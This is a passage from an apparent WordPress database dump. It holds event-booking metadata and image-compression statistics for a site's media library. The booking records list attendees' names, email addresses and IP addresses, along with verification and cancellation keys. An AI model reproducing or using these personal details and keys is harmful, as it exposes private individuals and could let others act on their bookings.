Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.98.136.116\";}}'),(163738,266784,'mec_price','0'),(163739,266784,'mec_gateway','MEC_gateway_free'),(163740,266784,'mec_gateway_label','Free'),(163741,266785,'mec_transaction_id','PHX31955'),(163742,266785,'mec_user_id','1000014'),(163743,266785,'mec_verified','1'),(163744,266785,'mec_verification_key','d60844149bbec8ddcae587e9de2cd1b3'),(163745,266785,'mec_cancellation_key','87af31e2f052a068b2747f0927bbdc8a'),(163746,266785,'mec_confirmed','1'),(163747,266785,'mec_event_id','266715'),(163748,266785,'mec_date','1655029800:1655076600'),(163749,266785,'mec_ticket_id',',1,'),(163750,266785,'mec_booking_time','2022-06-12 10:21:33'),(163751,266785,'mec_all_dates','a:0:{}'),(163752,266785,'mec_other_dates','a:0:{}'),(163753,266785,'mec_attention_time','1655029800:1655076600'),(163754,266785,'mec_attention_time_start','1655029800'),(163755,266785,'mec_attention_time_end','1655076600'),(163756,266785,'mec_book_date_submit','20220612102133'),(163757,266785,'mec_booking_location','129'),(163758,266785,'mec_ticket_price_1','0'),(163759,266785,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:4:\"kery\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"24.128.1.193\";}}'),(163760,266785,'mec_price','0'),(163761,266785,'mec_gateway','MEC_gateway_free'),(163762,266785,'mec_gateway_label','Free'),(163763,266786,'mec_transaction_id','POU61640'),(163764,266786,'mec_user_id','1000025'),(163765,266786,'mec_verified','1'),(163766,266786,'mec_verification_key','363b24375d7837b033f83c6a0f9f9e4a'),(163767,266786,'mec_cancellation_key','0314d950d45dcea0abb61f4968ca7d99'),(163768,266786,'mec_confirmed','1'),(163769,266786,'mec_event_id','266715'),(163770,266786,'mec_date','1655029800:1655076600'),(163771,266786,'mec_ticket_id',',1,'),(163772,266786,'mec_booking_time','2022-06-12 10:26:10'),(163773,266786,'mec_all_dates','a:0:{}'),(163774,266786,'mec_other_dates','a:0:{}'),(163775,266786,'mec_attention_time','1655029800:1655076600'),(163776,266786,'mec_attention_time_start','1655029800'),(163777,266786,'mec_attention_time_end','1655076600'),(163778,266786,'mec_book_date_submit','20220612102610'),(163779,266786,'mec_booking_location','129'),(163780,266786,'mec_ticket_price_1','0'),(163781,266786,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"bellasimons1@gmail.com\";s:4:\"name\";s:12:\"Bella Simons\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"167.224.107.54\";}}'),(163782,266786,'mec_price','0'),(163783,266786,'mec_gateway','MEC_gateway_free'),(163784,266786,'mec_gateway_label','Free'),(163785,266787,'mec_transaction_id','AKM39050'),(163786,266787,'mec_user_id','1000026'),(163787,266787,'mec_verified','1'),(163788,266787,'mec_verification_key','004c9dd8fe4a9a439feb805ddf9b4e50'),(163789,266787,'mec_cancellation_key','3c772ac31fafa046ad6a2f524f7632a2'),(163790,266787,'mec_confirmed','1'),(163791,266787,'mec_event_id','266715'),(163792,266787,'mec_date','1655029800:1655076600'),(163793,266787,'mec_ticket_id',',1,'),(163794,266787,'mec_booking_time','2022-06-12 10:30:18'),(163795,266787,'mec_all_dates','a:0:{}'),(163796,266787,'mec_other_dates','a:0:{}'),(163797,266787,'mec_attention_time','1655029800:1655076600'),(163798,266787,'mec_attention_time_start','1655029800'),(163799,266787,'mec_attention_time_end','1655076600'),(163800,266787,'mec_book_date_submit','20220612103018'),(163801,266787,'mec_booking_location','129'),(163802,266787,'mec_ticket_price_1','0'),(163803,266787,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:10:\"Tom Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"69.144.1.211\";}}'),(163804,266787,'mec_price','0'),(163805,266787,'mec_gateway','MEC_gateway_free'),(163806,266787,'mec_gateway_label','Free'),(163807,266788,'mec_transaction_id','SRW45694'),(163808,266788,'mec_user_id','1000027'),(163809,266788,'mec_verified','1'),(163810,266788,'mec_verification_key','dcbabd2a9fbe41312ebea1246af856ff'),(163811,266788,'mec_cancellation_key','ca1bc67d47bf66f12e8d7e2cf8e34f2e'),(163812,266788,'mec_confirmed','1'),(163813,266788,'mec_event_id','266715'),(163814,266788,'mec_date','1655029800:1655076600'),(163815,266788,'mec_ticket_id',',1,'),(163816,266788,'mec_booking_time','2022-06-12 10:32:11'),(163817,266788,'mec_all_dates','a:0:{}'),(163818,266788,'mec_other_dates','a:0:{}'),(163819,266788,'mec_attention_time','1655029800:1655076600'),(163820,266788,'mec_attention_time_start','1655029800'),(163821,266788,'mec_attention_time_end','1655076600'),(163822,266788,'mec_book_date_submit','20220612103211'),(163823,266788,'mec_booking_location','129'),(163824,266788,'mec_ticket_price_1','0'),(163825,266788,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"woodjohn185@gmail.com\";s:4:\"name\";s:9:\"John Wood\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"172.83.7.210\";}}'),(163826,266788,'mec_price','0'),(163827,266788,'mec_gateway','MEC_gateway_free'),(163828,266788,'mec_gateway_label','Free'),(163829,266789,'mec_transaction_id','LPQ47947'),(163830,266789,'mec_user_id','1000012'),(163831,266789,'mec_verified','1'),(163832,266789,'mec_verification_key','f6378e2db45da4d482a48d287fef606a'),(163833,266789,'mec_cancellation_key','7c5d431c24eb9250ca7a00618fe8e385'),(163834,266789,'mec_confirmed','1'),(163835,266789,'mec_event_id','266715'),(163836,266789,'mec_date','1655029800:1655076600'),(163837,266789,'mec_ticket_id',',1,'),(163838,266789,'mec_booking_time','2022-06-12 10:34:38'),(163839,266789,'mec_all_dates','a:0:{}'),(163840,266789,'mec_other_dates','a:0:{}'),(163841,266789,'mec_attention_time','1655029800:1655076600'),(163842,266789,'mec_attention_time_start','1655029800'),(163843,266789,'mec_attention_time_end','1655076600'),(163844,266789,'mec_book_date_submit','20220612103438'),(163845,266789,'mec_booking_location','129'),(163846,266789,'mec_ticket_price_1','0'),(163847,266789,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"65.130.31.17\";}}'),(163848,266789,'mec_price','0'),(163849,266789,'mec_gateway','MEC_gateway_free'),(163850,266789,'mec_gateway_label','Free'),(163851,266790,'mec_transaction_id','DAO21292'),(163852,266790,'mec_user_id','1000028'),(163853,266790,'mec_verified','1'),(163854,266790,'mec_verification_key','619331448b55fe971d0b08078fb17de5'),(163855,266790,'mec_cancellation_key','4437b3782cef6f74cf4ebab3b838f1fc'),(163856,266790,'mec_confirmed','1'),(163857,266790,'mec_event_id','266715'),(163858,266790,'mec_date','1655029800:1655076600'),(163859,266790,'mec_ticket_id',',1,'),(163860,266790,'mec_booking_time','2022-06-12 10:49:40'),(163861,266790,'mec_all_dates','a:0:{}'),(163862,266790,'mec_other_dates','a:0:{}'),(163863,266790,'mec_attention_time','1655029800:1655076600'),(163864,266790,'mec_attention_time_start','1655029800'),(163865,266790,'mec_attention_time_end','1655076600'),(163866,266790,'mec_book_date_submit','20220612104940'),(163867,266790,'mec_booking_location','129'),(163868,266790,'mec_ticket_price_1','0'),(163869,266790,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"edwardsgenesis21@gmail.com\";s:4:\"name\";s:14:\"Genesis Brown \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.153.253.31\";}}'),(163870,266790,'mec_price','0'),(163871,266790,'mec_gateway','MEC_gateway_free'),(163872,266790,'mec_gateway_label','Free'),(163873,266791,'mec_transaction_id','MWP96909'),(163874,266791,'mec_user_id','1000023'),(163875,266791,'mec_verified','1'),(163876,266791,'mec_verification_key','2956ae53d8e0c610b7eee7d22a3098fe'),(163877,266791,'mec_cancellation_key','31041071eed1747224d70ac76e6701ce'),(163878,266791,'mec_confirmed','1'),(163879,266791,'mec_event_id','266715'),(163880,266791,'mec_date','1655029800:1655076600'),(163881,266791,'mec_ticket_id',',1,'),(163882,266791,'mec_booking_time','2022-06-12 11:44:04'),(163883,266791,'mec_all_dates','a:0:{}'),(163884,266791,'mec_other_dates','a:0:{}'),(163885,266791,'mec_attention_time','1655029800:1655076600'),(163886,266791,'mec_attention_time_start','1655029800'),(163887,266791,'mec_attention_time_end','1655076600'),(163888,266791,'mec_book_date_submit','20220612114405'),(163889,266791,'mec_booking_location','129'),(163890,266791,'mec_ticket_price_1','0'),(163891,266791,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.58.137.16\";}}'),(163892,266791,'mec_price','0'),(163893,266791,'mec_gateway','MEC_gateway_free'),(163894,266791,'mec_gateway_label','Free'),(163895,266792,'mec_transaction_id','CVJ29975'),(163896,266792,'mec_user_id','1000023'),(163897,266792,'mec_verified','1'),(163898,266792,'mec_verification_key','d3430ecefd760c8a2b7ebc6c80fc5926'),(163899,266792,'mec_cancellation_key','41026bd0cac999a076e595be14ca0f5b'),(163900,266792,'mec_confirmed','1'),(163901,266792,'mec_event_id','266715'),(163902,266792,'mec_date','1655029800:1655076600'),(163903,266792,'mec_ticket_id',',1,'),(163904,266792,'mec_booking_time','2022-06-12 11:46:03'),(163905,266792,'mec_all_dates','a:0:{}'),(163906,266792,'mec_other_dates','a:0:{}'),(163907,266792,'mec_attention_time','1655029800:1655076600'),(163908,266792,'mec_attention_time_start','1655029800'),(163909,266792,'mec_attention_time_end','1655076600'),(163910,266792,'mec_book_date_submit','20220612114603'),(163911,266792,'mec_booking_location','129'),(163912,266792,'mec_ticket_price_1','0'),(163913,266792,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.58.137.16\";}}'),(163914,266792,'mec_price','0'),(163915,266792,'mec_gateway','MEC_gateway_free'),(163916,266792,'mec_gateway_label','Free'),(163917,266766,'original-file','2022/05/green-tree-field-smush-1-updraft-pre-smush-original.jpg'),(163918,266766,'smush-complete','1'),(163919,266766,'smush-info','The file was compressed from 312.23 KB to 292.73 KB saving 6.24 percent using WP-Optimize'),(163920,266766,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:319723;s:12:\"smushed-size\";i:299757;s:15:\"savings-percent\";d:6.2400000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:319723;s:10:\"compressed\";i:299757;}s:6:\"medium\";a:2:{s:8:\"original\";i:22592;s:10:\"compressed\";i:21669;}s:5:\"large\";a:2:{s:8:\"original\";i:213625;s:10:\"compressed\";i:203784;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10498;s:10:\"compressed\";i:10175;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:125204;s:10:\"compressed\";i:119421;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:38170;s:10:\"compressed\";i:36427;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:61690;s:10:\"compressed\";i:58871;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:41946;s:10:\"compressed\";i:40111;}s:8:\"tileview\";a:2:{s:8:\"original\";i:50041;s:10:\"compressed\";i:47512;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:430827;s:10:\"compressed\";i:414153;}}}'),(163921,21690,'original-file','2019/07/eck-logo-gray-sm-updraft-pre-smush-original.png'),(163922,21690,'smush-complete','1'),(163923,21690,'smush-info','The file was compressed from 3.20 KB to 2.23 KB saving 30.19 percent using WP-Optimize'),(163924,21690,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:3273;s:12:\"smushed-size\";i:2285;s:15:\"savings-percent\";d:30.190000000000001278976924368180334568023681640625;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:3273;s:10:\"compressed\";i:2285;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:3940;s:10:\"compressed\";i:2438;}}}'),(163925,25071,'original-file','2019/07/esc-temple-bgrid-1-updraft-pre-smush-original.jpg'),(163926,25071,'smush-complete','1'),(163927,25071,'smush-info','The file was compressed from 17.32 KB to 16.34 KB saving 5.67 percent using WP-Optimize'),(163928,25071,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17737;s:12:\"smushed-size\";i:16731;s:15:\"savings-percent\";d:5.6699999999999999289457264239899814128875732421875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:17737;s:10:\"compressed\";i:16731;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7583;s:10:\"compressed\";i:7190;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1640;s:10:\"compressed\";i:1264;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11084;s:10:\"compressed\";i:10357;}}}'),(163929,25073,'original-file','2019/07/eck-books-bgrid-1-updraft-pre-smush-original.png'),(163930,25073,'smush-complete','1'),(163931,25073,'smush-info','The file was compressed from 58.82 KB to 19.06 KB saving 67.59 percent using WP-Optimize'),(163932,25073,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60227;s:12:\"smushed-size\";i:19521;s:15:\"savings-percent\";d:67.590000000000003410605131648480892181396484375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:60227;s:10:\"compressed\";i:19521;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:39740;s:10:\"compressed\";i:13712;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:5359;s:10:\"compressed\";i:2873;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:51363;s:10:\"compressed\";i:17499;}}}'),(163933,26200,'original-file','2019/07/upcoming-seminars-bgrid-2-updraft-pre-smush-original.png'),(163934,26200,'smush-complete','1'),(163935,26200,'smush-info','The file was compressed from 60.70 KB to 20.48 KB saving 66.26 percent using WP-Optimize'),(163936,26200,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:62159;s:12:\"smushed-size\";i:20975;s:15:\"savings-percent\";d:66.2600000000000051159076974727213382720947265625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:62159;s:10:\"compressed\";i:20975;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:40630;s:10:\"compressed\";i:14477;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:5613;s:10:\"compressed\";i:2951;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:54465;s:10:\"compressed\";i:18956;}}}'),(163937,26249,'original-file','2019/07/esc-blog-bgrid-3-updraft-pre-smush-original.png'),(163938,26249,'smush-complete','1'),(163939,26249,'smush-info','The file was compressed from 55.56 KB to 20.69 KB saving 62.77 percent using WP-Optimize'),(163940,26249,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:56891;s:12:\"smushed-size\";i:21182;s:15:\"savings-percent\";d:62.77000000000000312638803734444081783294677734375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:56891;s:10:\"compressed\";i:21182;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:39004;s:10:\"compressed\";i:14788;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:5341;s:10:\"compressed\";i:3076;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:51948;s:10:\"compressed\";i:19791;}}}'),(163941,28862,'original-file','2019/07/ek-logo-white-med-updraft-pre-smush-original.png'),(163942,28862,'smush-complete','1'),(163943,28862,'smush-info','The file was compressed from 4.47 KB to 3.32 KB saving 25.8 percent using WP-Optimize'),(163944,28862,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:4581;s:12:\"smushed-size\";i:3399;s:15:\"savings-percent\";d:25.800000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:4581;s:10:\"compressed\";i:3399;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1954;s:10:\"compressed\";i:1934;}}}'),(163945,46829,'original-file','2019/07/eck-activities-sos-2-updraft-pre-smush-original.jpg'),(163946,46829,'smush-complete','1'),(163947,46829,'smush-info','The file was compressed from 13.72 KB to 13.03 KB saving 5.06 percent using WP-Optimize'),(163948,46829,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14054;s:12:\"smushed-size\";i:13343;s:15:\"savings-percent\";d:5.05999999999999960920149533194489777088165283203125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14054;s:10:\"compressed\";i:13343;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6323;s:10:\"compressed\";i:5862;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1708;s:10:\"compressed\";i:1342;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:7411;s:10:\"compressed\";i:6958;}}}'),(163949,64579,'original-file','2019/07/co-springs-location-B-updraft-pre-smush-original.jpg'),(163950,64579,'smush-complete','1'),(163951,64579,'smush-info','The file was compressed from 35.55 KB to 34.05 KB saving 4.24 percent using WP-Optimize'),(163952,64579,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:36408;s:12:\"smushed-size\";i:34864;s:15:\"savings-percent\";d:4.2400000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:36408;s:10:\"compressed\";i:34864;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7145;s:10:\"compressed\";i:6745;}s:6:\"medium\";a:2:{s:8:\"original\";i:20954;s:10:\"compressed\";i:20191;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1442;s:10:\"compressed\";i:1075;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:23849;s:10:\"compressed\";i:22871;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15820;s:10:\"compressed\";i:15169;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11981;s:10:\"compressed\";i:11438;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10448;s:10:\"compressed\";i:9919;}}}'),(163953,64822,'original-file','2019/07/loveland-center-sm-updraft-pre-smush-original.jpg'),(163954,64822,'smush-complete','1'),(163955,64822,'smush-info','The file was compressed from 50.51 KB to 41.15 KB saving 18.54 percent using WP-Optimize'),(163956,64822,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51722;s:12:\"smushed-size\";i:42134;s:15:\"savings-percent\";d:18.53999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:51722;s:10:\"compressed\";i:42134;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6994;s:10:\"compressed\";i:6577;}s:6:\"medium\";a:2:{s:8:\"original\";i:16134;s:10:\"compressed\";i:15491;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1446;s:10:\"compressed\";i:1079;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:23257;s:10:\"compressed\";i:22198;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:11866;s:10:\"compressed\";i:11335;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14491;s:10:\"compressed\";i:13941;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9648;s:10:\"compressed\";i:9158;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:30665;s:10:\"compressed\";i:29275;}}}'),(163957,64990,'original-file','2019/07/eck-temple-co-sm-updraft-pre-smush-original.jpg'),(163958,64990,'smush-complete','1'),(163959,64990,'smush-info','The file was compressed from 46.70 KB to 44.46 KB saving 4.79 percent using WP-Optimize'),(163960,64990,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:47825;s:12:\"smushed-size\";i:45532;s:15:\"savings-percent\";d:4.79000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:47825;s:10:\"compressed\";i:45532;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7170;s:10:\"compressed\";i:6784;}s:6:\"medium\";a:2:{s:8:\"original\";i:16465;s:10:\"compressed\";i:15600;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1507;s:10:\"compressed\";i:1138;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:23585;s:10:\"compressed\";i:22439;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:12149;s:10:\"compressed\";i:11494;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15665;s:10:\"compressed\";i:14832;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10086;s:10:\"compressed\";i:9672;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:32000;s:10:\"compressed\";i:30259;}}}'),(163961,68742,'original-file','2019/07/ek-sym-gold-sm-updraft-pre-smush-original.png'),(163962,68742,'smush-complete','1'),(163963,68742,'smush-info','The file was compressed from 7.74 KB to 3.40 KB saving 56.08 percent using WP-Optimize'),(163964,68742,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:7922;s:12:\"smushed-size\";i:3479;s:15:\"savings-percent\";d:56.0799999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:7922;s:10:\"compressed\";i:3479;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:4619;s:10:\"compressed\";i:2456;}}}'),(163965,83948,'original-file','2019/08/ek-logo-med-blue-updraft-pre-smush-original.png'),(163966,83948,'smush-complete','1'),(163967,83948,'smush-info','The file was compressed from 4.22 KB to 2.54 KB saving 39.81 percent using WP-Optimize'),(163968,83948,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:4326;s:12:\"smushed-size\";i:2604;s:15:\"savings-percent\";d:39.81000000000000227373675443232059478759765625;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:4326;s:10:\"compressed\";i:2604;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:3791;s:10:\"compressed\";i:2581;}}}'),(163969,94617,'original-file','2019/08/ocean-2-updraft-pre-smush-original.jpg'),(163970,94617,'smush-complete','1'),(163971,94617,'smush-info','The file was compressed from 385.52 KB to 362.80 KB saving 5.89 percent using WP-Optimize'),(163972,94617,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:394772;s:12:\"smushed-size\";i:371505;s:15:\"savings-percent\";d:5.88999999999999968025576890795491635799407958984375;s:10:\"sizes-info\";a:16:{s:4:\"full\";a:2:{s:8:\"original\";i:394772;s:10:\"compressed\";i:371505;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6014;s:10:\"compressed\";i:5571;}s:6:\"medium\";a:2:{s:8:\"original\";i:11897;s:10:\"compressed\";i:11401;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:60894;s:10:\"compressed\";i:58890;}s:5:\"large\";a:2:{s:8:\"original\";i:100976;s:10:\"compressed\";i:97821;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1346;s:10:\"compressed\";i:982;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:18873;s:10:\"compressed\";i:18153;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:8882;s:10:\"compressed\";i:8318;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:33776;s:10:\"compressed\";i:32549;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:65761;s:10:\"compressed\";i:63656;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:13206;s:10:\"compressed\";i:12671;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:32167;s:10:\"compressed\";i:31018;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:79468;s:10:\"compressed\";i:76838;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:8087;s:10:\"compressed\";i:7589;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:23465;s:10:\"compressed\";i:22560;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:98296;s:10:\"compressed\";i:95075;}}}'),(163973,98466,'original-file','2019/08/miracles_video-updraft-pre-smush-original.jpg'),(163974,98466,'smush-complete','1'),(163975,98466,'smush-info','The file was compressed from 32.49 KB to 30.44 KB saving 6.32 percent using WP-Optimize'),(163976,98466,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:33274;s:12:\"smushed-size\";i:31170;s:15:\"savings-percent\";d:6.32000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:33274;s:10:\"compressed\";i:31170;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7835;s:10:\"compressed\";i:7368;}s:6:\"medium\";a:2:{s:8:\"original\";i:15905;s:10:\"compressed\";i:14794;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1603;s:10:\"compressed\";i:1236;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:19593;s:10:\"compressed\";i:18215;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:11848;s:10:\"compressed\";i:11099;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18983;s:10:\"compressed\";i:17857;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10890;s:10:\"compressed\";i:10156;}}}'),(163977,99531,'original-file','2019/08/modern-prophet-tabs-2-updraft-pre-smush-original.jpg'),(163978,99531,'smush-complete','1'),(163979,99531,'smush-info','The file was compressed from 16.37 KB to 15.26 KB saving 6.78 percent using WP-Optimize'),(163980,99531,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:16764;s:12:\"smushed-size\";i:15627;s:15:\"savings-percent\";d:6.78000000000000024868995751603506505489349365234375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:16764;s:10:\"compressed\";i:15627;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8295;s:10:\"compressed\";i:7817;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1625;s:10:\"compressed\";i:1251;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:7902;s:10:\"compressed\";i:7385;}}}'),(163981,104339,'original-file','2019/08/login-bk-7-updraft-pre-smush-original.jpg'),(163982,104339,'smush-complete','1'),(163983,104339,'smush-info','The file was compressed from 173.36 KB to 160.38 KB saving 7.48 percent using WP-Optimize'),(163984,104339,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:177516;s:12:\"smushed-size\";i:164231;s:15:\"savings-percent\";d:7.480000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:16:{s:4:\"full\";a:2:{s:8:\"original\";i:177516;s:10:\"compressed\";i:164231;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2388;s:10:\"compressed\";i:1876;}s:6:\"medium\";a:2:{s:8:\"original\";i:4628;s:10:\"compressed\";i:3831;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:27658;s:10:\"compressed\";i:24672;}s:5:\"large\";a:2:{s:8:\"original\";i:49177;s:10:\"compressed\";i:44037;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:922;s:10:\"compressed\";i:537;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:7381;s:10:\"compressed\";i:6294;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:3411;s:10:\"compressed\";i:2787;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:14248;s:10:\"compressed\";i:12658;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:29829;s:10:\"compressed\";i:26575;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:4364;s:10:\"compressed\";i:3622;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:11031;s:10:\"compressed\";i:9812;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:30615;s:10:\"compressed\";i:27284;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:3005;s:10:\"compressed\";i:2419;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:8813;s:10:\"compressed\";i:7507;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:43190;s:10:\"compressed\";i:38908;}}}'),(163985,120546,'original-file','2019/08/splash-ek-logo-white-1-updraft-pre-smush-original.png'),(163986,120546,'smush-complete','1'),(163987,120546,'smush-info','The file was compressed from 2.68 